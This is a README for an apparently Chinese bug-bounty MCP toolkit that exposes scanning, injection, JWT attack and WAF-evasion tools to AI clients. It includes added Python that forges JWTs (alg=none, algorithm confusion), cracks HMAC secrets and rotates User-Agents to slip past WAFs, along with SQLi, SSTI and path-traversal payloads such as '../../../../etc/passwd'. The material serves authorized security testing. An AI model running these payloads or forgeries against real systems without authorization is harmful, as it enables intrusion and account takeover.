Xuanmu-BugBounty-mcp
Xuanmu-BugBounty-mcp is a self-contained, zero-dependency MCP toolkit for bug bounty hunting and SRC vulnerability testing, covering the full lifecycle from reconnaissance to report generation with built-in anti-blocking and WAF protection strategies.
Reconnaissance
- bb_ping: TCP + HTTP dual-mode target liveness detection
- bb_port_scan: TCP port scanning with Top100 or custom ranges
- bb_subdomain: DNS-based subdomain enumeration with custom wordlists
- bb_fingerprint: Web technology stack, CMS, and WAF fingerprinting
- bb_dir_scan: Directory/file brute-forcing with 150+ built-in sensitive paths
Vulnerability Detection
- bb_sqli: SQL injection (error-based, boolean, time-blind)
- bb_nosqli: NoSQL injection detection
- bb_xss: Reflected XSS across multiple contexts
- bb_ssti: SSTI for Jinja2, Twig, FreeMarker, Velocity, ERB, Smarty
- bb_cmdi: Command injection via time-blind and output-echo
- bb_ssrf: SSRF with internal network probing and OOB hints
- bb_cors: CORS misconfiguration testing
- bb_open_redirect: Open redirect detection with parameter scanning
- bb_file_upload: File upload bypass (extension, MIME, double extension, .htaccess, SVG)
- bb_csrf: CSRF detection via token analysis, SameSite, Referer/Origin checks
- bb_xxe: XXE detection (classic, blind OOB, XInclude, SVG)
- bb_lfi: LFI/path traversal with PHP filter tests
- bb_host_inject: Host header injection with 9 attack scenarios
- bb_takeover: Subdomain takeover via CNAME + 50+ cloud service matching
- bb_race: Race condition testing with concurrent requests and response diff analysis
Authentication & JWT Security
- bb_jwt_decode: Decode JWT header/payload without signature verification
- bb_jwt_analyze: Full JWT security analysis with vulnerability detection and attack suggestions
- bb_jwt_crack: HMAC key brute-force with built-in or custom wordlists
- bb_jwt_attack: JWT attacks: None algorithm, KID injection, RS256→HS256 confusion
- bb_graphql: GraphQL scanning: introspection, batch queries, deep recursion, schema extraction
Information Extraction
- bb_extract: Extract URLs and API endpoints from HTML and JS
- bb_secrets: Sensitive data detection with 20+ regex patterns (keys, tokens, passwords, internal IPs)
- bb_headers: Security header audit with scoring and remediation advice
- bb_param_discover: Auto parameter discovery from forms, queries, JSON fields, and JS variables
- bb_js_analyze: JavaScript file analysis
Utilities
- bb_send: Custom HTTP request sender with custom methods, headers, and body
- bb_payload: Payload factory for XSS/SQLi/SSTI/SSRF and more, with encoding variants
- bb_oob: OOB callback payload generator for blind SSRF/XXE/RCE verification
- bb_idor: IDOR testing
- bb_cloud_check: Cloud service security checking
- bb_waf_check: WAF identification
- bb_session: Multi-step session handling
- bb_report: Generate structured SRC-format Markdown vulnerability reports
All network tools support Bearer Token and Cookie authentication, proxy configuration, request timeouts, User-Agent rotation, and WAF protection modes (safe/aggressive) with retry logic and circuit breakers.
🎯 Xuanmu-BugBounty-mcp
Developed by Xuanmu Security Team (玄幕安全团队) · guaidao2
Standalone, self-contained MCP toolkit built for SRC bug hunting: zero external dependencies, install and run.
📦 Quick install
# 1. Clone the repository
git clone https://github.com/guaidao2/Xuanmu-Bugbounty-mcp.git
cd Xuanmu-Bugbounty-mcp   # the clone directory takes the repository name from the URL (case matters on Linux)
# 2. Install the package in editable mode (via the Tsinghua PyPI mirror)
pip install -e . -i https://pypi.tuna.tsinghua.edu.cn/simple
# 3. Start the MCP server (stdio mode)
# Option 1: run the installed command (recommended)
xuanmu-bb
# Option 2: run the script by absolute path with python
python "<absolute path>/src/xuanmu_bb/server.py"
🔌 MCP configuration
Configure it in an MCP-capable client (Claude Desktop, Cursor, Windsurf, etc.):
Option 1: use the xuanmu-bb command (recommended)
{
"mcpServers": {
"Xuanmu-BugBounty-mcp": {
"command": "xuanmu-bb",
"args": []
}
}
}
Option 2: invoke python with the absolute path of the script file
{
"mcpServers": {
"Xuanmu-BugBounty-mcp": {
"command": "python",
"args": ["<your project absolute path>/src/xuanmu_bb/server.py"]
}
}
}
💡 Replace <your project absolute path> with the full path where the project actually lives. Windows example: "D:\\Projects\\Xuanmu-BugBounty-mcp\\src\\xuanmu_bb\\server.py"
Note that the client launches the command with its own environment: if xuanmu-bb was installed into a virtualenv, either put that venv on the client's PATH or point "command" at the venv's xuanmu-bb (or python) executable by absolute path.
🔐 Authentication (both methods supported)
Target requires a login? Every HTTP tool accepts two kinds of authentication:

Method | Parameter | Use case
--- | --- | ---
Bearer Token | auth_token | Systems that log in with a JWT / OAuth2 token
Session Cookie | cookie | Form login / PHP/Java session based systems

# Bearer Token (API authentication)
bb_sqli url="https://target.com/api/search" params="q" auth_token="eyJhbGciOiJIUzI1NiIs..."
# Session Cookie (web authentication)
bb_xss url="https://target.com/search" params="q" cookie="JSESSIONID=ABCD1234"
# Probe the authentication state first
bb_param_discover url="https://target.com"
# The output is tagged: [AUTH: required] HTTP 401 or [AUTH: none] HTTP 200
🧰 All 39 tools
🔍 Reconnaissance module
Tool | Function | Parameters
--- | --- | ---
bb_ping | Liveness check: TCP + HTTP dual detection | target, timeout, proxy
bb_port_scan | Port scan: Top100 / custom range | target, ports, timeout, concurrent
bb_subdomain | Subdomain enumeration: bulk DNS resolution | domain, wordlist, concurrent
bb_fingerprint | Web fingerprinting: tech stack / CMS / WAF | url, proxy, cookie, auth_token
bb_dir_scan | Directory brute-force: 150+ built-in sensitive paths | url, wordlist, status_filter, concurrent, cookie, auth_token
🔥 Vulnerability detection module
Tool | Function | Parameters
--- | --- | ---
bb_sqli | SQL injection: error-based / boolean / time-blind | url, params, method, body, auth_token, cookie, waf_mode
bb_nosqli | NoSQL injection: MongoDB $ne/$gt/$regex | url, params, method, body, auth_token, cookie
bb_xss | XSS: reflected / multiple contexts | url, params, method, body, auth_token, cookie, waf_mode
bb_ssti | SSTI template injection: multi-engine detection | url, params, method, body, auth_token, cookie, waf_mode
bb_cmdi | Command injection: time-blind + output echo | url, params, method, body, auth_token, cookie, waf_mode
bb_ssrf | SSRF: internal network / cloud metadata / OOB | url, params, method, body, auth_token, cookie, waf_mode
bb_cors | CORS: 12 Origin test cases | url, auth_token, cookie
bb_open_redirect | Open redirect: parameter scan + redirect test | url, params, auth_token, cookie
bb_file_upload | File upload bypass: real upload + verify the file is reachable | url, auth_token, cookie
bb_csrf | CSRF: token / SameSite / Referer checks | url, auth_token, cookie
bb_xxe | XXE: classic / blind / SVG / XInclude | url, body, auth_token, cookie
bb_lfi | Path traversal: ../ traversal / PHP filter | url, params, method, body, auth_token, cookie, waf_mode
bb_host_inject | Host header injection: 9 attack scenarios | url, auth_token, cookie
bb_takeover | Subdomain takeover: CNAME + 50+ cloud service matching | domain, auth_token
bb_race | Race condition: concurrent requests + response diff analysis | url, method, data/body, concurrent, auth_token, cookie
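bb_race works by releasing many requests at the same instant and diffing the responses. The block below is an added example, not the project's own code, that shows why this finds bugs in single-use actions: a constructed in-process CouponService (a stand-in for a real HTTP endpoint, with a check-then-act window) is hit by N threads held at a barrier; the vulnerable variant grants the coupon more than once, the locked variant exactly once. The service, the function names and the thread count are my assumptions.

```python
"""Race-condition probe in the spirit of bb_race (added example, not the project's code).
The target is a constructed in-process CouponService; a real run would pass a function
that performs the HTTP request instead of service.claim."""
import threading
import time
from collections import Counter


class CouponService:
    """Constructed single-use coupon endpoint with a check-then-act window."""

    def __init__(self, atomic):
        self.atomic = atomic
        self.redeemed = False
        self._lock = threading.Lock()

    def claim(self):
        if self.atomic:
            # Hardened: the check and the write happen under one lock, so exactly one caller wins.
            with self._lock:
                if self.redeemed:
                    return "409 already redeemed"
                self.redeemed = True
                return "200 coupon granted"
        # Vulnerable: every concurrent caller passes the check before any of them writes.
        if self.redeemed:
            return "409 already redeemed"
        time.sleep(0.05)  # stands in for the DB round-trip between the check and the write
        self.redeemed = True
        return "200 coupon granted"


def race(send, concurrent=10):
    """Hold `concurrent` threads at a barrier so their requests land together,
    then tally the distinct responses (the response diff bb_race reports)."""
    barrier = threading.Barrier(concurrent)
    results, results_lock = [], threading.Lock()

    def worker():
        barrier.wait()  # every thread blocks here; the last arrival releases them all at once
        resp = send()
        with results_lock:
            results.append(resp)

    threads = [threading.Thread(target=worker) for _ in range(concurrent)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return Counter(results)


def is_racy(counts):
    """A single-use action is racy when more than one request received the success response."""
    return counts.get("200 coupon granted", 0) > 1


if __name__ == "__main__":
    for atomic in (False, True):
        counts = race(CouponService(atomic).claim)
        print("locked" if atomic else "vulnerable", dict(counts), "RACY" if is_racy(counts) else "ok")
```

Against a real target the barrier matters more than the thread count: ten requests that arrive within the same few milliseconds beat a hundred that trickle in, because the window is the server's check-to-write gap, not total volume. Always run the probe on a disposable account or test coupon, since a successful race has side effects by definition.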
🔐 Authentication security module
Tool | Function | Parameters
--- | --- | ---
bb_jwt_decode | JWT decode: parse header / payload | token
bb_jwt_analyze | JWT security analysis: vulnerability detection + attack suggestions | token
bb_jwt_crack | JWT key brute-force: HMAC dictionary attack | token, wordlist
bb_jwt_attack | JWT attacks: none / KID injection / algorithm confusion | token, mode, payload_override, public_key
bb_graphql | GraphQL scan: introspection / batching / recursion | url, auth_token, cookie
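The four bb_jwt_* tools above decode, analyse, crack and forge tokens. The block below is an added example that reimplements those checks with the Python standard library; it is not the project's code, and the function names (decode_unverified, analyze, crack_hmac, attack_none, attack_confusion), the sample token and its weak secret are my own. It goes slightly beyond the table: crack_hmac handles HS256/384/512, and attack_confusion shows the RS256→HS256 trick as "HMAC-sign with the public key PEM bytes", which only works when the verifier trusts the token's alg field.

```python
"""JWT checks in the spirit of bb_jwt_decode / bb_jwt_analyze / bb_jwt_crack / bb_jwt_attack.
Added example built on the standard library only; not the project's code."""
import base64
import hashlib
import hmac
import json
import time

HMAC_ALGS = {"HS256": hashlib.sha256, "HS384": hashlib.sha384, "HS512": hashlib.sha512}


def _b64url_decode(part):
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))  # JWTs strip the padding


def _b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _encode_part(obj):
    return _b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def decode_unverified(token):
    """bb_jwt_decode: parse header and payload WITHOUT checking the signature."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(payload_b64))


def analyze(token, now=None):
    """bb_jwt_analyze: weaknesses visible from the header and payload alone."""
    header, payload = decode_unverified(token)
    now = int(time.time()) if now is None else now
    findings = []
    alg = header.get("alg", "")
    if alg.lower() == "none":
        findings.append("alg=none: the signature is never checked")
    elif alg in HMAC_ALGS:
        findings.append(alg + ": symmetric HMAC, the secret may be guessable (try crack_hmac)")
    if "kid" in header:
        findings.append("kid header present: candidate for key-ID injection (path or SQL)")
    if "exp" not in payload:
        findings.append("no exp claim: the token never expires")
    elif payload["exp"] < now:
        findings.append("token already expired")
    return findings


def sign_hs(header, payload, secret):
    """Produce an HS256/384/512 token; used both to build the sample and for the attacks."""
    signing_input = _encode_part(header) + "." + _encode_part(payload)
    sig = hmac.new(secret, signing_input.encode(), HMAC_ALGS[header["alg"]]).digest()
    return signing_input + "." + _b64url_encode(sig)


def crack_hmac(token, wordlist):
    """bb_jwt_crack: recompute the HMAC under each candidate secret and compare."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    digest = HMAC_ALGS.get(json.loads(_b64url_decode(header_b64)).get("alg"))
    if digest is None:
        return None  # not an HMAC token, nothing to brute-force
    signing_input = (header_b64 + "." + payload_b64).encode()
    target = _b64url_decode(sig_b64)
    for candidate in wordlist:
        if hmac.compare_digest(hmac.new(candidate.encode(), signing_input, digest).digest(), target):
            return candidate
    return None


def attack_none(token, payload_override):
    """bb_jwt_attack mode=none: set alg to none and drop the signature."""
    header, payload = decode_unverified(token)
    header["alg"] = "none"
    payload.update(payload_override)
    return _encode_part(header) + "." + _encode_part(payload) + "."


def attack_confusion(token, payload_override, public_key_pem):
    """bb_jwt_attack RS256->HS256 confusion: HMAC-sign with the server's PUBLIC key bytes.
    Succeeds only when the verifier trusts the token's alg and hands its RSA key to HMAC."""
    header, payload = decode_unverified(token)
    header["alg"] = "HS256"
    payload.update(payload_override)
    return sign_hs(header, payload, public_key_pem.encode())


if __name__ == "__main__":
    # Constructed sample: HS256 token with a weak secret and a kid header.
    demo = sign_hs({"alg": "HS256", "typ": "JWT", "kid": "1"}, {"sub": "user", "role": "user"}, b"secret123")
    print(decode_unverified(demo))
    print(analyze(demo))
    print("cracked:", crack_hmac(demo, ["password", "secret", "secret123"]))
    print("alg=none forgery:", attack_none(demo, {"role": "admin"}))
```

A forged token is only a finding once the target accepts it: submit the alg=none or confusion token with bb_send and confirm the server returns the elevated resource, and try both "none" and "None"/"NONE" spellings, since some libraries only blocklist the lowercase form. For the confusion attack the exact PEM bytes matter (line endings, trailing newline), so use the key as the server publishes it.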
📋 Information extraction module
Tool | Function | Parameters
--- | --- | ---
bb_extract | URL / endpoint extraction: HTML + JS analysis | url, depth, auth_token, cookie
bb_secrets | Sensitive data detection: 20 regex patterns | url, auth_token, cookie, check_js
bb_headers | Security header audit: 8-item score + remediation advice | url, auth_token, cookie
bb_param_discover | Automatic parameter discovery: forms / query strings / JSON / JS | url, depth, auth_token, cookie
bb_js_analyze | Deep JS analysis: API routes / sourcemaps / hard-coded secrets / SPA / WebSocket | url, auth_token, cookie
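bb_secrets runs regex patterns over page and JavaScript text. The following is an added example, not the project's own pattern set: a small scanner with five assumed patterns (AWS access key ID, JWT, private-key header, generic key=value secrets, IPv4) that drops obvious placeholder values, reports only private-range addresses as internal IPs, and masks what it reports so the output can go straight into a report. The sample JS bundle is constructed and contains no real credential.

```python
"""Secret detection in the spirit of bb_secrets (added example; the pattern set is my
assumption, not the project's built-in 20 patterns)."""
import re
from ipaddress import ip_address

PATTERNS = {
    "aws_access_key": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]*"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    # key/secret/token/password = "value" in JS/JSON/env-style text; group(1) is the value
    "generic_secret": re.compile(
        r"(?i)\b(?:api[_-]?key|secret|token|password)\b\s*[:=]\s*['\"]([^'\"]{8,})['\"]"
    ),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
}
# Values that have the shape of a secret but are documentation filler, not a leak.
PLACEHOLDERS = {"changeme", "password", "xxxxxxxx", "your_api_key", "<secret>"}


def _mask(value):
    """Keep only the ends so a report proves the hit without republishing the secret."""
    return value if len(value) <= 8 else value[:4] + "..." + value[-4:]


def find_secrets(text):
    findings = []
    for name, pattern in PATTERNS.items():
        for m in pattern.finditer(text):
            kind = name
            value = m.group(1) if name == "generic_secret" else m.group(0)
            if name == "ipv4":
                try:
                    if not ip_address(value).is_private:
                        continue  # only internal addresses are interesting; skip public ones
                except ValueError:
                    continue  # e.g. 999.1.1.1 fits the regex but is not an address
                kind = "internal_ip"
            if value.lower() in PLACEHOLDERS:
                continue
            line = text.count("\n", 0, m.start()) + 1
            findings.append({"type": kind, "line": line,
                             "match": value if kind == "internal_ip" else _mask(value)})
    return findings


# Constructed sample bundle; nothing here is a real credential.
SAMPLE_JS = """// constructed sample bundle
const API_KEY = "changeme";
const config = { token: "sk_live_8f3a1c9e2b7d4e6f", host: "10.0.12.7", cdn: "93.184.216.34" };
var awsKey = "AKIAIOSFODNN7EXAMPLE";
"""

if __name__ == "__main__":
    for finding in find_secrets(SAMPLE_JS):
        print(finding)
```

Regex hits are leads, not findings: a matched AWS key ID is only reportable after you confirm it is live (and in scope), and an internal IP is informational unless it enables something else, such as an SSRF target. Keeping the masked value plus the line number is enough for triage and avoids pasting the full secret into a report that will be read by several people.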
🧰 Utilities module
Tool | Function | Parameters
--- | --- | ---
bb_send | Manual HTTP request: custom method / headers / body | url, method, headers, body, auth_token, cookie
bb_payload | Payload factory: 9 vulnerability classes × 6 encodings | vuln_type, encode, count
bb_oob | OOB helper: generate callback identifiers / payloads | mode, callback_url
bb_idor | IDOR detection: two-token comparison + sequential ID enumeration | url, token_owner, token_attacker, method, param
bb_cloud_check | Cloud service security: S3 / metadata / cloud config leaks | url, auth_token, cookie
bb_waf_check | WAF fingerprinting: 14 WAFs + bypass suggestions | url, auth_token, cookie
bb_session | Multi-step flow: session persistence + request chain | steps (JSON), proxy
bb_report | Vulnerability report: SRC-format Markdown | vuln_type, target, param, payload, impact
🚀 Usage examples
# Recon a target
bb_ping target="example.com"
bb_port_scan target="example.com" ports="80,443,8080-8090"
bb_subdomain domain="example.com"
bb_fingerprint url="https://example.com"
bb_dir_scan url="https://example.com"
# Vulnerability detection
bb_sqli url="https://example.com/page?id=1" params="id"
bb_xss url="https://example.com/search?q=test" params="q"
bb_ssti url="https://example.com/welcome?name=test" params="name"
bb_cmdi url="https://example.com/ping?host=127.0.0.1" params="host"
bb_ssrf url="https://example.com/fetch?url=http://example.com" params="url"
bb_cors url="https://api.example.com/data"
bb_open_redirect url="https://example.com/redirect?url=https://example.com"
bb_csrf url="https://example.com/change_password"
bb_xxe url="https://example.com/xml/parse"
bb_lfi url="https://example.com/file?name=test.txt" params="name"
bb_host_inject url="https://example.com/reset"
bb_takeover domain="sub.example.com"
bb_race url="https://example.com/api/coupon/claim" method="POST"
# JWT tools
bb_jwt_decode token="eyJhbGciOiJIUzI1NiIs..."
bb_jwt_analyze token="eyJhbGciOiJIUzI1NiIs..."
bb_jwt_crack token="eyJhbGciOiJIUzI1NiIs..."
bb_jwt_attack token="eyJhbGciOiJIUzI1NiIs..." mode="none"
# GraphQL
bb_graphql url="https://example.com/graphql"
# Information extraction
bb_extract url="https://example.com" depth=2
bb_secrets url="https://example.com" check_js=true
bb_headers url="https://example.com"
# POST body injection (new)
bb_sqli url="https://target.com/api/login" method="POST" body="username=admin&password=test" params="username"
bb_xss url="https://target.com/api/feedback" method="POST" body="message=test" params="message"
bb_cmdi url="https://target.com/api/ping" method="POST" body="host=127.0.0.1" params="host"
bb_xxe url="https://target.com/xml/parse" body="<?xml version='1.0'?><root>test</root>"
bb_lfi url="https://target.com/api/read" method="POST" body="file=../../../../etc/passwd" params="file"
bb_ssti url="https://target.com/welcome" method="POST" body="name={{7*7}}" params="name"
# Utilities
bb_payload vuln_type="xss" encode="all" count=20
bb_send url="https://example.com/api/login" method="POST" headers='{"Content-Type": "application/json"}' body='{"user":"admin","pass":"123"}'
bb_report vuln_type="sqli" target="https://example.com/page?id=1" payload="' OR 1=1 -- "
# Deep JS analysis
bb_js_analyze url="https://example.com" auth_token="..."
# WAF detection
bb_waf_check url="https://example.com"
# IDOR detection
bb_idor url="https://api.example.com/users/1234" \
token_owner="eyJ...owner_token..." \
token_attacker="eyJ...attacker_token..."
# Multi-step flow
bb_session steps='[
{"method":"POST","url":"https://target.com/login","body":"user=admin&pass=test"},
{"method":"GET","url":"https://target.com/api/profile"}
]'
# Cloud service check
bb_cloud_check url="https://example.com"
# Automatic parameter discovery + NoSQL injection
bb_param_discover url="https://example.com/api"
bb_nosqli url="https://example.com/api/user?id=1"
🛡️ WAF protection engine
The scan tools with WAF detection support (sqli/xss/ssti/cmdi/ssrf/lfi/dir_scan) integrate it automatically:

Parameter | Default | Description
--- | --- | ---
(not recovered) | (not recovered) | Number of retries after being blocked; once the limit is exceeded the circuit breaker trips automatically

Only this one row of the parameter table survived; the other rows, and the parameter names and defaults, are not recoverable here. The tools accept at least waf_mode (safe / aggressive) and request_delay, as in the example below.

Workflow:
1. Pre-check: send a harmless request to fingerprint the WAF
2. WAF found → automatically slow down + rotate the User-Agent + print bypass suggestions
3. During the scan: detect block pages in real time (403/503/challenge pages)
4. Circuit breaker: N consecutive blocks → abort automatically → output a circuit-breaker report

Detect the WAF first:
bb_waf_check url="https://target.com"
Scan with WAF protection enabled:
bb_sqli url="https://target.com/page?id=1" waf_mode="safe" request_delay="3"
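Steps 2 to 4 of that workflow, as an added example rather than the project's client.py: a sender that recognises block pages, rotates the User-Agent and backs off after each block (exponentially in safe mode, flat in aggressive mode), and raises CircuitOpen after max_retries consecutive blocks. The transport is a constructed fake with the shape (url, headers) -> (status, body); the thresholds, the block-page markers and the User-Agent list are assumptions, and a real run would plug in an HTTP call with the same shape.

```python
"""WAF-aware request loop for steps 2-4 of the workflow above (added example; not the
project's client.py). The transport is a constructed fake with the shape
(url, headers) -> (status, body); the thresholds and block markers are assumptions."""
import itertools
import time

USER_AGENTS = [  # rotated on every attempt; a real list would be much longer
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15",
    "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0",
]
# Body fragments typical of block / challenge pages (assumed list).
BLOCK_MARKERS = ("access denied", "request blocked", "captcha", "attention required", "cf-ray")


def looks_blocked(status, body):
    """Step 3: a 403/503/429 or a challenge page means the WAF intervened."""
    lowered = body.lower()
    return status in (403, 503, 429) or any(marker in lowered for marker in BLOCK_MARKERS)


class CircuitOpen(Exception):
    """Step 4: raised once max_retries consecutive blocks have been seen."""


class WafAwareClient:
    def __init__(self, transport, waf_mode="safe", request_delay=1.0, max_retries=3, sleeper=time.sleep):
        self.transport = transport
        self.waf_mode = waf_mode          # "safe" backs off exponentially, "aggressive" keeps the base delay
        self.request_delay = request_delay
        self.max_retries = max_retries
        self.sleeper = sleeper            # injectable so a test can record delays instead of waiting
        self.consecutive_blocks = 0
        self.total_blocks = 0
        self._ua_cycle = itertools.cycle(USER_AGENTS)

    def send(self, url):
        while True:
            headers = {"User-Agent": next(self._ua_cycle)}  # step 2: rotate the UA on every attempt
            status, body = self.transport(url, headers)
            if not looks_blocked(status, body):
                self.consecutive_blocks = 0
                return status, body
            self.consecutive_blocks += 1
            self.total_blocks += 1
            if self.consecutive_blocks >= self.max_retries:
                raise CircuitOpen(f"{self.consecutive_blocks} consecutive blocks at {url}; scan aborted")
            factor = 2 ** self.consecutive_blocks if self.waf_mode == "safe" else 1
            self.sleeper(self.request_delay * factor)  # step 2: slow down after a block


def make_fake_waf(block_first_n):
    """Constructed target: serves a block page for the first N requests, then 200."""
    state = {"seen": 0}

    def transport(url, headers):
        state["seen"] += 1
        if state["seen"] <= block_first_n:
            return 403, "<html><title>Access Denied</title>Request blocked by WAF</html>"
        return 200, "<html>search results for " + url + "</html>"

    return transport


if __name__ == "__main__":
    client = WafAwareClient(make_fake_waf(2), waf_mode="safe", request_delay=1.0,
                            sleeper=lambda s: print("sleeping", s))
    print(client.send("https://target.example/page?id=1"))
    try:
        WafAwareClient(make_fake_waf(5), sleeper=lambda s: None).send("https://target.example/page?id=1")
    except CircuitOpen as exc:
        print("circuit open:", exc)
```

The circuit breaker is there for the tester as much as for the target: once a WAF has started blocking, every further payload only adds to the block count and to the logs, so stopping and switching approach (encoding variants from bb_payload, a different parameter, a lower rate) is better than pushing through. Counting total_blocks separately from consecutive_blocks lets the final report say how often the WAF intervened even when the scan finished.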
🏗️ Project structure
src/xuanmu_bb/
├── server.py # MCP entry point (38 tool registrations)
├── client.py # HTTP client (proxy / cookie / UA rotation / anti-blocking strategy)
├── utils.py # shared helper functions
├── data/ # built-in data (payload dictionaries / fingerprints / WAF library / regex patterns)
├── recon/ # reconnaissance module (5 tools)
├── vuln/ # vulnerability detection module (15 tools)
├── auth/ # authentication security module (5 tools)
├── extract/ # information extraction module (5 tools)
└── tools/ # utilities module (9 tools)
🧪 Technical highlights
Fully self-contained: no dependency on external tools such as nmap/nuclei/burp, pure Python implementation
Zero external scanner dependencies: does not rely on yakit/tscanplus/nuclei, runs on its own
Rich built-in data: 200+ subdomain wordlist / 150+ directory wordlist / 1000+ port-to-service mappings / 500+ payloads
Anti-blocking strategy: User-Agent rotation / request interval control / proxy support
Tsinghua mirror: uses pypi.tuna.tsinghua.edu.cn by default to speed up installation
Covers the full SRC workflow: information gathering → vulnerability detection → exploitation verification → report generation
📝 License
This project is for lawful security testing and vulnerability research only. Users must comply with applicable laws and regulations.
Xuanmu-BugBounty-mcp © 2026 Xuanmu Security Team (玄幕安全团队) · guaidao2